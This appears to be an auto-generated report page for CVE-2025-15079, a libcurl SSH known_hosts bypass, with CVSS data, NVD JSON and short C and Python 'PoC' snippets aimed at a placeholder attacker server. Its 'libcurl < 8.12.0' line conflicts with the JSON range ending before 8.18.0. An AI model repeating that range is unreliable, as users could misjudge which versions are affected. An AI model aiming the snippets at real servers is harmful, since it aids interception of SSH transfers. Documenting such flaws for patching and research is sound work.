Security Vulnerability Report

CVE-2025-15079

Published: 2026-01-08 10:15:47
Last Modified: 2026-01-20 14:50:24
Source: 2499f714-1537-4658-8207-48ae4bb9eae9

Description

When doing SSH-based transfers using either SCP or SFTP, and setting the known_hosts file, libcurl could still mistakenly accept connecting to hosts *not present* in the specified file if they were added as recognized in the libssh *global* known_hosts file.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:haxx:curl:*:*:*:*:*:*:*:* - VULNERABLE
libcurl < 8.12.0 (speculative)
Multiple versions in the libcurl 7.x - 8.x series may be affected

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
// CVE-2025-15079 PoC - libcurl SSH known_hosts bypass
// This PoC demonstrates how libcurl accepts hosts not in user-specified known_hosts
// if they are present in the libssh global known_hosts file
#include <stdio.h>
#include <curl/curl.h>

int main(void)
{
    CURL *curl;
    CURLcode res;

    // Initialize libcurl
    curl = curl_easy_init();
    if(curl) {
        // Set user-specified known_hosts file (should only trust these hosts)
        curl_easy_setopt(curl, CURLOPT_SSH_KNOWNHOSTS, "/path/to/user_known_hosts");

        // Target malicious/untrusted SSH server
        curl_easy_setopt(curl, CURLOPT_URL, "sftp://attacker-controlled-server/file.txt");

        // Credentials
        curl_easy_setopt(curl, CURLOPT_USERPWD, "user:password");

        // This connection will succeed even if attacker-server is NOT in user_known_hosts
        // because libcurl/libssh checks the GLOBAL known_hosts file
        res = curl_easy_perform(curl);

        if(res != CURLE_OK) {
            printf("Connection failed: %s\n", curl_easy_strerror(res));
        } else {
            printf("VULNERABLE: Connection accepted despite host not in user_known_hosts!\n");
        }

        curl_easy_cleanup(curl);
    }
    return 0;
}
```

```python
# Python equivalent using pycurl
import pycurl

c = pycurl.Curl()
c.setopt(pycurl.URL, "sftp://target-server/sensitive-file")
c.setopt(pycurl.SSH_KNOWNHOSTS, "/path/to/user_known_hosts")
c.setopt(pycurl.USERPWD, "username:password")

# This will bypass user-specified known_hosts if host exists in global known_hosts
c.perform()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15079", "sourceIdentifier": "2499f714-1537-4658-8207-48ae4bb9eae9", "published": "2026-01-08T10:15:47.100", "lastModified": "2026-01-20T14:50:24.330", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When doing SSH-based transfers using either SCP or SFTP, and setting the\nknown_hosts file, libcurl could still mistakenly accept connecting to hosts\n*not present* in the specified file if they were added as recognized in the\nlibssh *global* known_hosts file."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-297"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:haxx:curl:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.58.0", "versionEndExcluding": "8.18.0", "matchCriteriaId": "7FEF1B43-51CF-47FA-8D6C-2411D9B3F9C1"}]}]}], "references": [{"url": "https://curl.se/docs/CVE-2025-15079.html", "source": "2499f714-1537-4658-8207-48ae4bb9eae9", "tags": ["Vendor Advisory", "Patch"]}, {"url": "https://curl.se/docs/CVE-2025-15079.json", "source": "2499f714-1537-4658-8207-48ae4bb9eae9", "tags": ["Vendor Advisory"]}, {"url": "https://hackerone.com/reports/3477116", "source": "2499f714-1537-4658-8207-48ae4bb9eae9", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/07/6", "source": 
"af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory", "Patch"]}]}}